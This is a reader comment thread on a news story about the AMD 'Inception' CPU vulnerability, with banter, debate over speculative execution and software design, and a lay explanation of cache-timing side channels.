
Epyc fail there
Hahah! All those fools who bought AMD kit. Serves you right!
Me with my GenuineIntel CPU on the other hand .... Oh, wait. Nevermind
AMD processor users, you have another data-leaking vulnerability to deal with: like Zenbleed, this latest hole can be to steal sensitive data from a running vulnerable machine. The flaw (CVE-2023-20569), dubbed Inception in reference to the Christopher Nolan flick about manipulating a person's dreams to achieve a desired …
That's possible, of course, but these microarchitectural side channels are really easy to introduce accidentally (they amount to failing to clean everything up), and because there are so many of them they're difficult to find comprehensively. Zenbleed was found by microarchitectural fuzzing (dunno about Inception, as I haven't gotten to the paper yet), which is a stochastic process, not exhaustive. CPU manufacturers have limited resources just like everyone else, and their testing focus will be on getting the correct documented behavior from the chips.
I built a home-brew desktop PC several years ago, and decided that time around, to move from AMD chips to Intel. A new shiny Intel Core i7-6700K, no less. And then someone found it was full of holes. In recent times, I was thinking of replacing the CPU/motherboard/RAM with an AMD combination. A new-ish laptop has an octo-core AMD Ryzen 7 PRO 5850U, and the quad-core desktop CPU seems quant. So I have been browsing motherboards and CPU options that behave with Rocky Linux 8 and play nice with Virtual Box. An 8-core CPU is a reasonable chunk of cash, and I was thinking AMD - based on what happened with Intel. And now they have holes! Are there any processors out there that do not contain serious bugs? Asking for a friend...
"Are there any processors out there that do not contain serious bugs? Asking for a friend..."
Serious answer ....... No.
The bugs are either not found *yet* or as in the recent case of Intel & AMD 'there as expected'.
The real question is are these 'Bugs' genuine mistakes or convenient facilitators for 3 letter organisations we all know so well !!!
:)
Or computers with non-trusted software downloaded. Consider pads and smartphones, which all have dozens of partially trusted apps downloaded, “protected” by OS sandbox.
Yes, I know not AMD, but this is a proof-of-concept for what can be done against poorly-considered speculative execution implementations. *Everything* has SpecEx. The starting gun really fires when someone takes down some ARM processors
https://developer.arm.com/Arm%20Security%20Center/Speculative%20Processor%20Vulnerability
Remember, these are attacks against implementations, not ISA. Just because ARM cores are mitigated, doesn’t mean that e.g, Qualcomm or Apple implemented ARM compatible is. And if anyone ever lets a dozen different shonky RISCV speculative execution implementations out into the wild, we might as well go back into caves and hitting each other with sticks. Fortunately, that’s twenty years away, and always will be.
For most day to day work we really don't need multiple cores running sophisticated multi-pipeline processors. We only do this because we run horrendously inefficient software which all has to execute at the same priority level.
Bigger is not automatically better.
I take the sentiment, but suggest the answer is the opposite. The underlying problem is indeed pointlessly abstracted code, without any thought to performance, which creates a push to single-threaded performance at all costs. Deep pipelines and speculative execution have been the hardware response. But a better HW solution would be: lowered clock frequency and shallow pipelines, which would remove (much of) the need for speculative execution. Then we could afford the power and area for hundreds of low-complexity CPU cores, because cache consumes 90%+ of silicon area.
The critical issue is getting compilers to be able to split the problem onto large numbers of threads automatically…..which they can’t do, because neither the compiler *nor the developer* has an f’ing clue what actual typical program flow is, because “object-oriented”.
But the problem is even more on-topic than that. This particular security flaw occurs because a CPU hardware branch predictor can be forced to mis-predict. So we can ask, why do CPUs have HW branch predictors at all, rather than hard-coded compiler hints? The answer is….object-oriented and DRY. Don’t Repeat Yourself. Two or more entirely different logical causes, result the same section of code being executed. Due to modern software practices, there simply is no single answer as to “what is the most likely branch”, it depends on what called it. Hence run-time branch predictors. This is a *direct* consequence of object-oriented design and DRY.
I'm nowhere near knowledgable enough on this subject to be able to tell whether your analysis and solution are either intelligent or ill-informed in the first place.
But it does give the impression of involving somewhat similar issues to those that Intel's Itanium CPU revolved around (i.e. the reliance on the assumption that the compiler would- and could- be responsible for instruction scheduling (i.e. statically) which existing CPU designs normally did at runtime (i.e. dynamically), and its failure in part because- in Donald Knuth's words- such compilers turned out to be "impossible to write").
You say that "Due to modern software practices, there simply is no single answer as to “what is the most likely branch”". Am I correct in assuming that you'd blame this whole modern approach to writing software for making compiler-generated static scheduling effectively an impossible task?
It sounds about right. I have written a lot of close to the hardware code that squeezes the maximum performance out of a processor and its memory so got very familiar with the properties of pipelined processors. The nature of my work, though, was such that I'd be using simpler / lower performance processors, the code being embedded meant that you always had to know what was going on at all times in the system. I've also met misapplied object design many times over the years, its how we train programmers so naturally this is how they design code. I've found that the resulting code is messy beyond belief -- the top level design may seem clean enough but the implementation becomes so disjointed that nobody's sure what's going on (and untangling everything can literally be beyond the capabilities of a smart programmer -- I have witnessed programmers driven to despair (and resignation) by this kind of code, pushback just not being possible because its the 'correct' way to write code and anyone who begs to differ is obviously not a real programmer).
Yes, that is my conclusion, although I wouldn’t necessarily go all the way to static scheduling. There is a middle way, eg unspeculated out-of-order execution, register renaming.
Knuth’s point: “such compilers turned out to be impossible to write", I would turn upside down. The software industry decided that we needed to be able to write arbitrary general code, and stuff the consequences. And indeed, it seems to be too difficult to compile that effectively, to the microarchitecture that we would want. But the alternative is simple: decide to change coding standards (mostly) or language (occasionally) to allow reasonable compilers to function. Why evangelise SOLID, polymorphism, object-oriented, dynamic typing etc, when it leads to this shitshow outcome? Why not select software standards to match machine constraints, or at least match microarchitectures to standard software constructs?
Here’s an example: Linux has a standard stack size of 8MB per process “because it doesn’t hurt anything, it’s negligible compared to main memory”, since 1995. Except, it does hurt. If we placed a 2MB hardware constraint on stack size, CPUs could (now) implement stack in on-chip RAM (not cache!). Deterministic low access time to stack would make just a *massive* difference, including security: you can make much harder guarantees against stack overflow plus add separate physical call-stack buffer. Dividing heap/stack as on-chip/off-chip would also be quite a logical distinction.
There’s half a dozen other examples. But absolutely nobody commercial is taking this kind of HW/SW co-design seriously. That’s my real point. People may well have their own opinion whether the specific idea of on-chip stack is good or no. But there’s no industrial *mechanism* to make such radical changes any more. Everything is designed for “the general case”, whatever the consequence.
Or computers with non-trusted software downloaded
Which is basically all consumer general-use computers, of course. You don't need to worry about malware exploiting microarchitectural side channels if you're blithely installing random crap from whatever source with elevated permissions. Key loggers are a lot more effective.
Which is not to say that these attacks aren't worth researching and, in appropriate cases, mitigating; just that people need to keep their threat model in mind.
Shared computers including virtual hosts that run unknown servers running unknown processes*
*Even within a single organisation that controls everything, there are likely multiple groups involved running a virtual server and likely nobody has an overall view of everything. This gets worse in the public cloud, even when running private networks.
Part of the problem is the cross sharing of IP with Intel and AMD. x86 is Intel IP and x64 is AMD. So often times because the basic architecture is the same x64 on x86 you will see similar holes in both manufacturers (there are nuances that separate them). The only way this really changes is if we can come up with a new standard away from x86/x64. However that means backwards compatibility and no one wants to kick that hornets nest for fear of sales loss (my opinion).
It goes something like this:
Essentially, if you're a low-privileged authorised logged in user, you can craft code along the lines of "give me the root password" and arrange it so that that executes in a branch following an if statement. Ideally, the code when it reaches the "give me the root password" section should get firmly rebuffed and the process terminated with a nasty exception, or something.
The CPU, to save time, will try executing both possible pathways out of the if, whilst the condition itself is still being evaluated. For the CPU the idea is that once the if statement's condition is resolved, at least one part of the CPU has already been headed down the correct execution pathway. This makes it faster, and is something that's more or less necessary to make long instruction execution piplelines keep moving.
The trouble is that, in speculatively executing code like this, it seems modern CPUs are a little bit casual about "user privilege", and can actually execute code that the user is not privileged to execute. It's a "run first, ask the question 'should I?' later" thing. So, it might actually let the branch execute the "what's the root password?" instruction, even though the user is not priviledged to do so. But because it's disposing of this branch (it's the wrong side of the if), the CPU never gets round to asking the question. It shouldn't matter, because this branch's data is going to get dumped anyway.
The problem is that in cleaning up the dead-end code branch's data that shouldn't have been acquired, CPUs are not accounting for what else someone might have written into their code (things like cache flushes). So, the dead end branch, having learned a secret but having no way of exfiltrating the secret to the remainder of the program (because the CPU is going to dispose of the branch and its data), can give away hints of what the data was by either clearing the cache, or not. Do that repeatedly, and you can repeatedly learn the secret (repeatedly call the carefully crafted if statement), and exfiltrate it bit by bit by either clearing or not clearing the cache.
Meanwhile another program is paying close attention to execution times of its code, and can see the side effects of the cache either being cleared or not cleared. This is a bit like this program picking up a Morse radio signal from a transmitter; eventually it learns the secret.
The Register did very well to highlight this type of flaw early, a long time ago. It's a fundamental problem for CPU designs; long pipelines and speculative execution are necessary for high speed performance. Do away with speculative execution, we're back to the computing dark ages. Make the speculative execution more fussy about user privilege, and things also slow down.
these hacks are mostly a problem for major networks, right? Yes, small/home nets are vulnerable, but it's too much trouble for not enough gain to hack them. The money's in corporate and government and similar nets. I have to care at the office, but not at home, correct? Or am I missing something?